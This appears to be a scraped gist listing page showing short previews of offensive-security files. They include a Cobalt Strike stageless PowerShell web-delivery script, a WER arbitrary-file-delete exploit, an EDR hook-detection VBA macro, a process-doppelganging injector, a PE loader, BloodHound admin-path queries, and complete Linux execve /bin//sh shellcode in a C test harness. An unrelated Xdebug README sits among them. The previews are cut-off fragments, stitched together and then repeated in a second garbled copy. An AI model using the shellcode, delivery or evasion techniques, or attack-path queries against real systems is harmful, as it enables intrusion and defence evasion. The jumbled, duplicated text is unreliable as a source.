Lz1y Lz1y

## stagelessweb.cna
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.

## WerArbitraryFileDelete.cs
using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

## FindClass_final.java
//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Field;
import java.util.HashSet;
import java.util.Scanner;

public class a {

## hookdetector.vba
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr

## fofa_rule.sql
/*
 Navicat Premium Data Transfer

 Source Server         : localhost
 Source Server Type    : MySQL
 Source Server Version : 50542
 Source Host           : localhost
 Source Database       : rule

 Target Server Type    : MySQL

## inject.c
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
//  Vyacheslav Rusakov @swwwolf
//  Tom Bonner @thomas_bonner
//

#include <Windows.h>

## PELoader.cs
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;


## shellcode.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

## README.md

      
              1 file
            
          
              66 forks
            
          
              87 comments
            
          
              413 stars
            
          
                chadrien
                / README.md
            
            
              Last active
              September 1, 2023 12:43
            
              
                Debug PHP in Docker with PHPStorm and Xdebug
              
          
    Debug your PHP in Docker with Intellij/PHPStorm and Xdebug


For your local dev, create a Dockerfile that is based on your production image and
simply install xdebug into it. Exemple:

FROM php:5

RUN yes | pecl install xdebug \
&amp;&amp; echo "zend_extension=$(find /usr/local/lib/php/extensions/ -name xdebug.so)" &gt; /usr/local/etc/php/conf.d/xdebug.ini \


## gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name

That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------

MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,
	# Scripted Web Delivery (Stageless)
	#
	# This script demonstrates some of the new APIs in Cobalt Strike 3.7.

	# setup our stageless PowerShell Web Delivery attack
	sub setup_attack {
	local('%options $script $url $arch');
	%options = $3;

	# get the arch right.
	using NtApiDotNet;
	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.IO;
	using System.Linq;
	using System.Text;
	using System.Threading;
	using System.Threading.Tasks;
	//Author:fnmsd
	//Blog:https://blog.csdn.net/fnmsd
	import javax.servlet.http.HttpServletRequest;
	import javax.servlet.http.HttpServletResponse;
	import java.lang.reflect.Field;
	import java.util.HashSet;
	import java.util.Scanner;

	public class a {
	Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
	Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
	Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

	'VBA Macro that detects hooks made by EDRs
	'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


	Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
	Dim address As LongPtr
	/*
	Navicat Premium Data Transfer

	Source Server : localhost
	Source Server Type : MySQL
	Source Server Version : 50542
	Source Host : localhost
	Source Database : rule

	Target Server Type : MySQL
	//
	// Ref = src
	// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
	//
	// Credits:
	// Vyacheslav Rusakov @swwwolf
	// Tom Bonner @thomas_bonner
	//

	#include <Windows.h>
	using System;
	using System.IO;
	using System.IO.Compression;
	using System.Text;
	using System.Collections.Generic;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;
	#include<stdio.h>
	#include<string.h>

	unsigned char code[] = \
	"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

	main()
	{

	printf("Shellcode Length: %d\n", strlen(code));
	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)
	WITH
	U.name as n,